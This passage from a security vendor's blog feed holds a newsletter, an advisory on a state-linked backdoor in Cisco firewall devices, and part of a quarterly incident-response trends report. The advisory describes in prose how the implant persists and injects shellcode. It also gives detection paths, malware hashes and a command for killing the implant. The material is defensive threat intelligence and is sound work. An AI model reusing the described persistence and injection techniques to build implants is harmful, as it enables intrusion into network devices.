vulnerabilities&#xA0;</li><li>They reuse the same tools and techniques&#xA0;</li><li>They follow repeatable patterns&#xA0;</li><li>And, critically, they don&#x2019;t behave like your users</li></ul><p>Even when they successfully authenticate, move laterally, or establish persistence, their activity introduces detectable anomalies.</p><p>That&#x2019;s where the opportunity lies for defenders.&#xA0;</p><div class="kg-card kg-header-card kg-v2 kg-width-regular " data-background-color="#000000">
            
            <picture><img class="kg-header-card-image" src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/YiR2025_background-2.jpg" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/YiR2025_background-2.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/YiR2025_background-2.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/YiR2025_background-2.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/YiR2025_background-2.jpg 2000w" loading="lazy" alt="Five defender priorities from the Talos Year in Review"></picture>
        
            <div class="kg-header-card-content">
                
                <div class="kg-header-card-text kg-align-center">
                    <h2 id="read-the-2025-cisco-talos-year-in-review" class="kg-header-card-heading" style="color: #FFFFFF;" data-text-color="#FFFFFF"><span style="white-space: pre-wrap;">Read the 2025 Cisco Talos Year in Review</span></h2>
                    
                    <a href="https://blog.talosintelligence.com/content/files/2026/03/2025YiR-report.pdf" class="kg-header-card-button kg-style-accent" style="color: #FFFFFF;" data-button-color="accent" data-button-text-color="#FFFFFF">Download now</a>
                </div>
            </div>
        </div>]]></content:encoded></item><item><title><![CDATA[It pays to be a forever student]]></title><description><![CDATA[In this newsletter, Joe discusses why understanding other disciplines can often flow back into the macro and micro of cybersecurity, especially in a world of AI.]]></description><link>https://blog.talosintelligence.com/it-pays-to-be-a-forever-student/</link><guid isPermaLink="false">69e91b771bf70b0001e1a22d</guid><category><![CDATA[Threat Source newsletter]]></category><dc:creator><![CDATA[Joe Marshall]]></dc:creator><pubDate>Thu, 23 Apr 2026 18:00:22 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/threat_source-3.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/threat_source-3.jpg" alt="It pays to be a forever student"><p>Welcome to this week&#x2019;s edition of the Threat Source newsletter.&#xA0;</p><p>If I&#xA0;haven&#x2019;t&#xA0;said it in a newsletter before,&#xA0;I&apos;ll&#xA0;say it now: If you want to be good at cybersecurity, be a forever student. Cultivating and feeding your desire to know how things work is one of the key ingredients to being a hacker.&#xA0;It&#x2019;s&#xA0;not always about understanding the micro details, but the macro of how systems work. And not just computers or software or networking systems &#x2014; those are ecosystems&#xA0;we&#x2019;re&#xA0;usually quite familiar with &#x2014; but what about economics?&#xA0;agriculture? material sciences?&#xA0;human&#xA0;behavior?&#xA0;music&#xA0;and art? Do any of those carry any value into this profession?&#xA0;</p><p>They&#xA0;damn sure do.&#xA0;Many, many&#xA0;times I have had to branch my technical research into domains that&#xA0;arbitrarily seem to provide&#xA0;no immediate value for technical problems. Learning how maritime insurance fraud works was interesting to me &#x2014; and&#xA0;a short time&#xA0;later, led to cyber insurance and understanding how risk guides security investment in massive companies. Understanding international agriculture helped me research threat actor targeting and ransomware cartel victimology.&#xA0;</p><p>One of the topics&#xA0;I&apos;ve&#xA0;been researching heavily lately is economics, specifically industrial&#xA0;organization.&#xA0;It&#x2019;s&#xA0;a branch of economics that studies how companies structure production, how markets form around them, and how costs&#xA0;operate&#xA0;at scale. For me, the natural target of my curiosity was&#xA0;Ford&#xA0;Motor Company. Henry Ford&#xA0;didn&#x2019;t&#xA0;invent the car or the assembly line, but he was darn sure able to build and scale car production in a way that set the standard for all others in that space to emulate.&#xA0;I&#x2019;ve&#xA0;learned about fixed vs. variable costs, how artisans had their knowledge crystalized within the assembly line process, and how and how amortized costs drove down prices, allowing the Ford Model T to exceed 900,000 units annually by the early 1920s. By that time, more than half of the registered automobiles in the world were Fords. Not half of American cars,&#xA0;<em>half of all cars on Earth.</em>&#xA0;</p><p>So what? Well, what took Ford Motor Company 17 years to achieve in cost and ceiling reductions, the AI industry has done in 2.5 years. The rapid and massive influx of investments, fierce competition, and available&#xA0;compute&#xA0;has shown what industrial organization means in a world where AI now almost permeates everything we see and touch. What does this mean for AI replacing jobs? Are we the artisans who move to the frontier of security? What does this mean for enabling threat actors who can move up a step to threatening others with tools developed using an AI corpus already trained on security? There are lots of questions, and to be honest, the future&#xA0;isn&#x2019;t&#xA0;clear here. One thing is for certain: We can look&#xA0;to&#xA0;the past to understand the future. Henry Ford said it best: &#x201C;Progress happens when all the factors that make for it are ready, and then it is inevitable.&#x201D;&#xA0;</p><p>As much as we tend to be myopic as security professionals and focus on our tradecraft, we are all part of a series of interconnected systems that&#xA0;lets&#xA0;humanity function. Learning those systems &#x2014; their quirks, their limitations, and their vulnerabilities &#x2014; makes you a better hacker. Stay curious, friends.&#xA0;</p><h2 id="the-one-big-thing">The one&#xA0;big thing&#xA0;</h2><p>Cisco Talos&#xA0;Incident Response (Talos IR)&#xA0;is sharing&#xA0;<a href="https://blog.talosintelligence.com/ir-trends-q1-2026/" rel="noreferrer noopener"><u>Q1 2026 incident response trends</u></a>. Phishing has officially reclaimed its crown as the top&#xA0;initial&#xA0;access vector. In a notable first, responders&#xA0;observed&#xA0;adversaries leveraging&#xA0;Softr, an AI-powered web development tool, to rapidly generate credential-harvesting pages. Meanwhile, actual ransomware deployments hit absolute zero this quarter thanks to swift mitigation&#xA0;by Talos IR, though pre-ransomware activity accounted for 18% of engagements this quarter.&#xA0;</p><h3 id="why-do-i-care">Why do I care?&#xA0;</h3><p>The barrier to entry for cybercriminals is plummeting, and they are increasingly using our own tools against us. The use of AI platforms to spin up phishing infrastructure means even unsophisticated actors can launch high-speed, code-free attacks. Furthermore, threat actors are abusing legitimate developer tools like&#xA0;TruffleHog&#xA0;and native cloud APIs to quietly hunt for exposed secrets, making detection incredibly difficult for defenders already struggling with logging gaps.&#xA0;</p><h3 id="so-now-what">So now what?&#xA0;</h3><p>It&#x2019;s&#xA0;time to get back to basics and lock down your perimeter. Organizations must implement properly configured multi-factor authentication (MFA), specifically restricting self-service enrollment to stop attackers from registering new devices. Defenders also need to prioritize robust patch management and ensure centralized logging via a SIEM is in&#xA0;place&#xA0;so forensic evidence&#xA0;remains&#xA0;intact. Read the&#xA0;<a href="https://blog.talosintelligence.com/ir-trends-q1-2026/" rel="noreferrer noopener"><u>full blog</u></a>&#xA0;for a deeper dive into this quarter&apos;s trends and adversary tactics.&#xA0;</p><h2 id="top-security-headlines-of-the-week">Top security headlines of the week&#xA0;</h2><p><strong>Third U.S.</strong>&#xA0;<strong>security</strong>&#xA0;<strong>expert</strong>&#xA0;<strong>admits</strong>&#xA0;<strong>helping</strong>&#xA0;<strong>ransomware</strong>&#xA0;<strong>gang</strong>&#xA0;<br>According to the Justice Department, Martino abused his role as a ransomware negotiator for five companies by providing the&#xA0;BlackCat/Alphv&#xA0;cybercrime group with information useful in negotiating a ransom payment. (<a href="https://www.securityweek.com/third-us-security-expert-admits-helping-ransomware-gang/" rel="noreferrer noopener"><u>SecurityWeek</u></a>)&#xA0;</p><p><strong>22</strong>&#xA0;<strong>BRIDGE:BREAK</strong>&#xA0;<strong>flaws expose thousands of</strong>&#xA0;<strong>Lantronix</strong>&#xA0;<strong>and Silex serial-to-IP converters</strong>&#xA0;<br>Successful exploitation of the&#xA0;flaws&#xA0;could allow attackers to disrupt serial communications with field assets, conduct lateral movement, and tamper with sensor values or&#xA0;modify&#xA0;actuator behavior. (<a href="https://thehackernews.com/2026/04/22-bridgebreak-flaws-expose-20000.html" rel="noreferrer noopener"><u>The Hacker News</u></a>)&#xA0;</p><p><strong>How hackers &#x201C;trojan-horsed&#x201D; QEMU virtual machines to bypass security and drop ransomware</strong>&#xA0;<br>In recent incidents, attackers used QEMU, an open-source machine emulator and&#xA0;virtualizer, to run hidden environments where malicious activity remained&#xA0;largely invisible&#xA0;to endpoint defenses and left minimal evidence on the host system. (<a href="https://www.techradar.com/pro/essentially-invisible-how-hackers-trojan-horsed-qemu-virtual-machines-to-bypass-security-and-drop-ransomware" rel="noreferrer noopener"><u>TechRadar</u></a>)&#xA0;</p><p><strong>Mastodon says its flagship server was hit by a DDoS attack</strong>&#xA0;<br>The&#xA0;cyber attack&#xA0;targeting Mastodon comes days after Bluesky, another decentralized social network, resolved much of&#xA0;its days-long&#xA0;outagesfollowing&#xA0;a lengthy DDoS attack. (<a href="https://techcrunch.com/2026/04/20/mastodon-says-its-flagship-server-was-hit-by-a-ddos-attack/" rel="noreferrer noopener"><u>TechCrunch</u></a>)&#xA0;</p><p><strong>Exploits turn Windows Defender into attacker tool</strong>&#xA0;<br>Threat actors are using three publicly available proof-of-concept exploits (two are unpatched) to attack Microsoft Defender and turn the security platform&apos;s primary cleanup and protection functions against organizations it is designed to protect. (<a href="https://www.darkreading.com/cyberattacks-data-breaches/exploits-turn-windows-defender-attacker-tool" rel="noreferrer noopener"><u>Dark Reading</u></a>)&#xA0;</p><h2 id="can%E2%80%99t-get-enough-talos">Can&#x2019;t&#xA0;get enough Talos?&#xA0;</h2><p><a href="https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" rel="noreferrer noopener"><strong><u>Bad Apples: Weaponizing native macOS primitives for movement and execution</u></strong></a>&#xA0;<br>Talos documented several macOS living-off-the-land (LOTL) techniques,&#xA0;demonstrating&#xA0;that native pathways for movement and execution remain accessible to those who understand the underlying architecture.&#xA0;</p><p><a href="https://www.youtube.com/watch?v=wppL7JBshK8&amp;list=PLpPXZRVU-dX0r-hvoVuVa53GNgyAJ_4Ad" rel="noreferrer noopener"><strong><u>AI phishing, fake CAPTCHA, and real-world cyber threat trends</u></strong></a>&#xA0;<br>The Talos team breaks down findings from Q1 2026 &#x2014; including phishing returning as the top&#xA0;initial&#xA0;access vector, and how attackers are using AI tools to build credential harvesting campaigns in almost no time at all.&#xA0;</p><p><a href="https://blog.talosintelligence.com/uat-4356-firestarter/" rel="noreferrer noopener"><strong><u>UAT-4356&apos;s targeting of Cisco Firepower devices</u></strong></a><strong>&#xA0;</strong>&#xA0;<br>UAT-4356&#xA0;exploited&#xA0;n-day vulnerabilities&#xA0;(CVE-2025-20333&#xA0;and&#xA0;CVE-2025-20362)&#xA0;to gain unauthorized access to vulnerable devices,&#xA0;where the threat actor deployed&#xA0;their custom-built&#xA0;backdoor&#xA0;dubbed &#x201C;FIRESTARTER.&#x201D;&#xA0;</p><h2 id="upcoming-events-where-you-can-find-talos">Upcoming events where you can find Talos&#xA0;</h2><ul><li><a href="https://pivotcon.org/" rel="noreferrer noopener"><u>PIVOTcon</u></a>&#xA0;(May 6 &#x2013; 8) M&#xE1;laga, Spain&#xA0;</li><li><a href="https://www.offensivecon.org/" rel="noreferrer noopener"><u>OffensiveCon</u></a>&#xA0;(May 15 &#x2013; 16)&#xA0;Berlin, Germany&#xA0;</li><li><a href="https://www.ciscolive.com/global.html?zid=pp" rel="noreferrer noopener"><u>Cisco Live U.S.</u></a>&#xA0;(May 31&#xA0;&#x2013;&#xA0;June 4) Las Vegas, Nevada&#xA0;</li></ul><h2 id="most-prevalent-malware-files-from-talos-telemetry-over-the-past-week">Most prevalent malware files from Talos telemetry over the past week&#xA0;</h2><p><strong>SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507</strong>&#xA0;<br>MD5: 2915b3f8b703eb744fc54c81f4a9c67f&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507</u></a>&#xA0;<br>Example Filename:&#xA0;VID001.exe&#xA0;<br>Detection Name:&#xA0;Win.Worm.Coinminer::1201&#xA0;</p><p><strong>SHA256: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974</strong>&#xA0;<br>MD5: aac3165ece2959f39ff98334618d10d9&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974</u></a>&#xA0;<br>Example Filename: d4aa3e7010220ad1b458fac17039c274_63_Exe.exe&#xA0;<br>Detection Name:&#xA0;W32.Injector:Gen.21ie.1201&#xA0;</p><p><strong>SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59</strong>&#xA0;<br>MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59</u></a>&#xA0;<br>Example Filename: APQ9305.dll&#xA0;<br>Detection Name: Auto.90B145.282358.in02&#xA0;</p><p><strong>SHA256: 5e6060df7e8114cb7b412260870efd1dc05979454bd907d8750c669ae6fcbcfe</strong>&#xA0;<br>MD5: a2cf85d22a54e26794cbc7be16840bb1&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=5e6060df7e8114cb7b412260870efd1dc05979454bd907d8750c669ae6fcbcfe" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=5e6060df7e8114cb7b412260870efd1dc05979454bd907d8750c669ae6fcbcfe</u></a>&#xA0;<br>Example Filename: a2cf85d22a54e26794cbc7be16840bb1.exe&#xA0;<br>Detection Name: W32.5E6060DF7E-100.SBX.TG&#xA0;</p><p><strong>SHA256: 3c1dbc3f56e91cc79f0014850e773a7f12bbfef06680f08f883b2bf12873eccc</strong>&#xA0;<br>MD5: d749e0f8f2cd4e14178a787571534121&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=3c1dbc3f56e91cc79f0014850e773a7f12bbfef06680f08f883b2bf12873eccc" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=3c1dbc3f56e91cc79f0014850e773a7f12bbfef06680f08f883b2bf12873eccc</u></a>&#xA0;<br>Example&#xA0;Filename: KitchenCanvas_753447.exe&#xA0;<br>Detection Name: W32.3C1DBC3F56-90.SBX.TG&#xA0;</p>]]></content:encoded></item><item><title><![CDATA[UAT-4356's Targeting of Cisco Firepower Devices]]></title><description><![CDATA[Cisco Talos is aware of UAT-4356's continued active targeting of Cisco Firepower devices’ Firepower eXtensible Operating System (FXOS). UAT-4356 exploited n-day vulnerabilities (CVE-2025-20333 and CVE-2025-20362) to gain unauthorized access to vulnerable devices.]]></description><link>https://blog.talosintelligence.com/uat-4356-firestarter/</link><guid isPermaLink="false">69e058a6645a220001422b4d</guid><category><![CDATA[Threat Advisory]]></category><category><![CDATA[Threats]]></category><category><![CDATA[APT]]></category><category><![CDATA[Cisco Talos Network Intrusion Prevention]]></category><category><![CDATA[Cisco Talos Antivirus]]></category><category><![CDATA[Cisco Talos Malware Protection]]></category><dc:creator><![CDATA[Cisco Talos]]></dc:creator><pubDate>Thu, 23 Apr 2026 15:10:57 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/arcane_door.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/arcane_door.jpg" alt="UAT-4356&apos;s Targeting of Cisco Firepower Devices"><p>Cisco Talos is aware of <a href="https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/">UAT-4356</a>&apos;s continued <a href="https://cisa.gov/news-events/directives/v1-ed-25-03-identify-and-mitigate-potential-compromise-cisco-devices" rel="noreferrer">active targeting</a> of Cisco Firepower devices&#x2019; Firepower eXtensible Operating System (FXOS). UAT-4356 exploited n-day vulnerabilities (<a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-webvpn-z5xP8EUB">CVE-2025-20333</a> and <a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-webvpn-YROOTUW">CVE-2025-20362</a>) to gain unauthorized access to vulnerable devices, where the threat actor deployed their custom-built backdoor dubbed &#x201C;FIRESTARTER.&#x201D; FIRESTARTER considerably overlaps with the technical capabilities of <a href="https://www.ncsc.gov.uk/sites/default/files/documents/ncsc-mar-rayinitiator-line-viper.pdf">RayInitiator&#x2019;s Stage 3 shellcode</a> that processes incoming XML-based payloads to endpoint APIs.</p><p>In early 2024, Cisco Talos attributed <a href="https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/">ArcaneDoor</a>, a state-sponsored campaign focused on gaining access to network perimeter devices for espionage, to UAT-4356.</p><p>Customers are advised to refer to <a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-persist-CISAED25-03">Cisco&#x2019;s Security Advisory</a> for mitigation and detection guidance, indicators of compromise (IOCs), affected products, and applicable software upgrade recommendations.</p><hr><h2 id="the-firestarter-backdoor">The FIRESTARTER backdoor</h2><p>FIRESTARTER is a malicious backdoor implanted by UAT-4356 that allows remote access and control to execute arbitrary code inside the LINA process, a core component of Cisco&#x2019;s ASA and FTD appliances running FXOS.</p><h3 id="persistence">Persistence</h3><p>UAT-4356 established persistence for FIRESTARTER on compromised devices by manipulating the mount list for Cisco Service Platform (CSP), namely &#x201C;CSP_MOUNT_LIST&#x201D;, to execute FIRESTARTER. The mount list allows programs and commands to be executed as part of the device&#x2019;s boot sequence. The persistence mechanism triggers during graceful reboot (i.e., when a process termination signal is received). FIRESTARTER also checks the runlevel for value 6 (indicating device reboot) and in case of a match, writes itself to backup location &#x201C;/opt/cisco/platform/logs/var/log/svc_samcore.log&quot; and updates the CSP_MOUNT_LIST to copy itself back to &#x201C;/usr/bin/lina_cs&#x201D; and then be executed. When FIRESTARTER runs after a reboot, it restores the original CSP_MOUNT_LIST and removes the trojanized copy. Because the runlevel triggers establishment of this transient persistence mechanism, a hard reboot (for example, after the device has been unplugged from power) effectively removes the implant from the device.</p><p>FIRESTARTER has used the following commands to establish persistence for itself using the transient persistence mechanism:</p><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/data-src-image-d095a102-ece8-4d0a-9d5a-16ba6d021264.png" class="kg-image" alt="UAT-4356&apos;s Targeting of Cisco Firepower Devices" loading="lazy" width="937" height="573" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/04/data-src-image-d095a102-ece8-4d0a-9d5a-16ba6d021264.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/data-src-image-d095a102-ece8-4d0a-9d5a-16ba6d021264.png 937w" sizes="(min-width: 720px) 720px"></figure><p>When the implant injects itself into the LINA process, it removes the traces of its persistence mechanism by restoring the CSP_MOUNT_LIST from a temporary copy (&#x201C;CSP_MOUNTLIST.tmp&#x201D;), then removing the temporary copy and the FIRESTARTER file from disk (&#x201C;/usr/bin/lina_cs&#x201D;).</p><h3 id="firestarter%E2%80%99s-backdoor-capabilities">FIRESTARTER&#x2019;s backdoor capabilities</h3><p>FIRESTARTER can run arbitrary shellcode received by the device. A pre-defined handler function specified by a hardcoded offset in the LINA process&#x2019; memory is replaced by an unauthorized handler routine that parses the data being served to it. FIRESTARTER specifically looks for a WebVPN request XML. If the request data received matches a specific pattern of custom-defined prefixing then the shellcode that immediately follows it is executed in memory. If the prefixing bytes are not found, then the data is treated as regular request data and passed to the original handler function (if any).</p><p>FIRESTARTER&#x2019;s loading mechanism, Stage 2 shellcode (i.e., the actual request handler component), handler function replacement, XML parsing for magic bytes, and final payload execution display considerable overlaps with <a href="https://www.ncsc.gov.uk/sites/default/files/documents/ncsc-mar-rayinitiator-line-viper.pdf">RayInitiator&#x2019;s Stage 3</a> deployment actions and accompanying artifacts.</p><h3 id="injecting-and-activating-the-malicious-shellcode-in-lina">Injecting and activating the malicious shellcode in LINA</h3><p>FIRESTARTER first reads the LINA process&#x2019; memory to search for and verify the presence of the bytes (long) 0x1, 0x2, 0x3, 0x4, 0x5 at specific locations in memory. If found, FIRESTARTER will then query the process&#x2019; memory to find an &#x201C;r-xp&#x201D; memory range for the shared library &#x201C;libstdc++.so&#x201D;. It then copies the next stage shellcode (Stage 2) to the last 0x200 bytes of the memory region. FIRESTARTER then overwrites an internal data structure in the LINA process&#x2019; memory to replace a pointer to a WebVPN-specific, legitimate XML handler function with the address of the malicious Stage 2 shellcode.</p><p>The malicious shellcode is triggered as part of the authentication API&#x2019;s request handling process and parses the incoming request data for magic markers signifying an executable payload. If found, the executable payload is then executed on the compromised device.</p><hr><h2 id="detection-guidance">Detection guidance</h2><p>The presence of the following artifacts - specifically the filenames &#x201C;lina_cs&#x201D; and &#x201C;svc_samcore.log&#x201D; - though somewhat brittle indicators, may indicate the presence of the FIRESTARTER on a Firepower device:</p><ul><li>Any output from the commands:<ul><li>show kernel process | include lina_cs</li></ul></li><li>The presence of the following files on disk:<ul><li>/usr/bin/lina_cs</li><li>/opt/cisco/platform/logs/var/log/svc_samcore.log</li></ul></li></ul><p>For more comprehensive detection guidance, please refer to <a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-persist-CISAED25-03">Cisco&#x2019;s Security Advisory here</a>. Please also refer to CISA&#x2019;s update to V1: <a href="https://cisa.gov/news-events/directives/v1-ed-25-03-identify-and-mitigate-potential-compromise-cisco-devices" rel="noreferrer">Emergency Directive (ED) 25-03</a>: Identify and Mitigate Potential Compromise of Cisco Devices and <a href="https://www.cisa.gov/news-events/analysis-reports/ar26-113a">FIRESTARTER Backdoor Malware Analysis Report</a> for more information and guidance.</p><p>&#xA0;</p><h2 id="mitigation-and-coverage">Mitigation and coverage</h2><p>We recommend that Cisco customers follow the steps recommended in <a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-persist-CISAED25-03">Cisco&apos;s advisory</a>, with particular attention to any applicable software upgrade recommendations. Organizations impacted can initiate a <a href="https://www.cisco.com/c/en/us/support/index.html">TAC request</a> for Cisco support.</p><p>A FIRESTARTER infection may be mitigated on all affected devices by reimaging the devices.</p><p>On Cisco FTD software that is not in lockdown mode, there is also the option of killing the lina_cs process then reloading the device:</p>
<!--kg-card-begin: html-->
<pre>
&gt; expert
$ sudo kill -9 $(pidof lina_cs)
$ exit
&gt; reboot
</pre>
<!--kg-card-end: html-->
<p>Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on <a href="https://www.snort.org/products">Snort.org</a>.</p><p>The following Snort rules cover the vulnerabilities <a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-webvpn-z5xP8EUB">CVE-2025-20333</a> and <a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-webvpn-YROOTUW">CVE-2025-20362</a>: <strong>65340, 46897</strong>.</p><p>Snort rules covering FIRESTARTER: <strong>62949</strong></p><p>The following ClamAV signatures detect this threat: <strong>Unix.Malware.Generic-10059965-0</strong></p>]]></content:encoded></item><item><title><![CDATA[IR Trends Q1 2026: Phishing reemerges as top initial access vector, as attacks targeting public administration persist]]></title><description><![CDATA[Phishing reemerged as the most observed means of gaining initial access, accounting for over a third of the engagements where initial access could be determined. Phishing has not been the top vertical for initial access since Q2 2025.]]></description><link>https://blog.talosintelligence.com/ir-trends-q1-2026/</link><guid isPermaLink="false">69e61dd4645a220001422ba1</guid><category><![CDATA[Talos IR trends]]></category><category><![CDATA[CTIR trends]]></category><dc:creator><![CDATA[Aliza Johnson]]></dc:creator><pubDate>Wed, 22 Apr 2026 10:00:34 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/TalosIR_quarterly_trends.jpg" medium="image"/><content:encoded><![CDATA[<ul><li>Phishing reemerged as the most observed means of gaining initial access, accounting for over a third of the engagements where&#xA0;initial&#xA0;access could be&#xA0;determined.&#xA0;Phishing&#xA0;has not been the top vector for&#xA0;initial&#xA0;access since Q2 2025.</li><li>Public administration and health&#xA0;care&#xA0;tied&#xA0;as the most targeted industry verticals, each accounting for 24&#xA0;percent&#xA0;of all engagements. This is the third consecutive quarter where public administration has been the most targeted industry&#xA0;vertical.&#xA0;&#xA0;</li><li>Pre-ransomware incidents made up just 18&#xA0;percent&#xA0;of engagements this quarter, and we did not&#xA0;observe&#xA0;any ransomware deployment due to early and swift mitigation from&#xA0;Cisco&#xA0;Talos Incident Response (Talos IR). This is a slight increase from last quarter but&#xA0;overall&#xA0;very low&#xA0;compared to Q1 and Q2 2025, when we&#xA0;observed&#xA0;ransomware in 50&#xA0;percent&#xA0;of engagements.</li></ul><hr><figure class="kg-card kg-embed-card kg-card-hascaption"><iframe width="200" height="113" src="https://www.youtube.com/embed/wppL7JBshK8?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen title="The TTP 23: AI Phishing, Fake CAPTCHA &amp; Real-World Cyber Threat Trends (Q1 2026)"></iframe><figcaption><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/TalosIR_quarterly_trends.jpg" alt="IR Trends Q1 2026: Phishing reemerges as top initial access vector, as attacks targeting public administration persist"><p><span style="white-space: pre-wrap;">Watch this video to see Talos experts break down the trends and offer guidance for defenders.</span></p></figcaption></figure><h2 id="ai-tool-leveraged-in-phishing-campaign">AI tool&#xA0;leveraged&#xA0;in phishing campaign&#xA0;</h2><p>Talos IR responded to a campaign that&#xA0;leveraged&#xA0;phishing,&#xA0;the most common means of&#xA0;initial&#xA0;access this quarter, to compromise the most targeted industry vertical this quarter:&#xA0;public administration. Notably, the actors&#xA0;leveraged&#xA0;the&#xA0;Softr AI-based web application development service, marking the first time we have documented the use of a specific AI tool by an adversary in a phishing campaign.&#xA0;Softr&#xA0;was used to generate a credential harvesting page targeting users&#x2019; Microsoft Exchange and Outlook Web Access (OWA) accounts.&#xA0;</p><p>State-sponsored and criminal actors have been&#xA0;observed&#xA0;abusing large language models (LLMs) to aid in the development of phishing lures, malicious scripts, and other tasks. DDoS-as-a-service actors have adopted AI algorithms for defense evasion and attack orchestration. While this is the first time we have documented the use of a specific AI tool in a Talos IR incident, we have moderate confidence that malicious actors have used&#xA0;Softr&#x2019;s&#xA0;AI-powered web application creation platform since at May 2023, based on Cisco Umbrella data and other telemetry, and have done so with increasing frequency to date.&#xA0;&#xA0;&#xA0;&#xA0;</p><p>This incident&#xA0;demonstrates&#xA0;how AI tools can lower the barrier to entry for less sophisticated actors and/or accelerate the speed of phishing and credential-harvesting campaigns. Using a form template and the &#x201C;vibe coding&#x201D; feature, a phishing page like the one used in this attack could be quickly created with a few AI prompts and no code. Phishing pages built with&#xA0;Softr&#xA0;can direct data to a disposable external data store, such as Google Sheets, and send alerts for new captures via email&#xA0;&#x2014;&#xA0;all without code.&#xA0;&#xA0;&#xA0;&#xA0;</p><h2 id="crimson-collective-seen-for-the-first-time">Crimson Collective seen for the first time&#xA0;&#xA0;&#xA0;</h2><p>Talos IR experienced its first case involving Crimson Collective, a cyber extortion group that appeared in September 2025. This attack highlighted&#xA0;the use of valid accounts for&#xA0;initial&#xA0;access, the second&#xA0;most commonly&#xA0;observed&#xA0;means of&#xA0;initial&#xA0;access this quarter. This attack also notably involved targeting exploit weaknesses, the second-most observed security weakness, accounting for 25&#xA0;percent&#xA0;of all engagements.&#xA0;We attribute this activity to Crimson Collective based on IPs associated with the group that were used to scan the victim&apos;s ASA firewalls, as well as an overlap of observed tactics and techniques with publicly reported Crimson Collective attacks.&#xA0;</p><p>The incident began when a GitHub Personal Access Token (PAT) was inadvertently published on a public-facing&#xA0;website, exposing the organization to adversaries for several months. Upon obtaining access, the adversary used&#xA0;TruffleHog, an open-source tool commonly&#xA0;utilized&#xA0;by security professionals, to scan thousands of&#xA0;victim&#xA0;GitHub repositories for&#xA0;additional&#xA0;secrets and sensitive information. This approach allows attackers to perform reconnaissance without triggering suspicion, as they are&#xA0;leveraging&#xA0;standard, legitimate tools. The attacker&#x2019;s discovery of client secrets through&#xA0;TruffleHog&#xA0;enabled further access to&#xA0;the victim&#x2019;s&#xA0;Azure cloud storage, where they used Microsoft Graph API calls to authenticate, explore, and exfiltrate data. The abuse of legitimate cloud APIs&#xA0;demonstrates&#xA0;a growing trend where threat actors use native 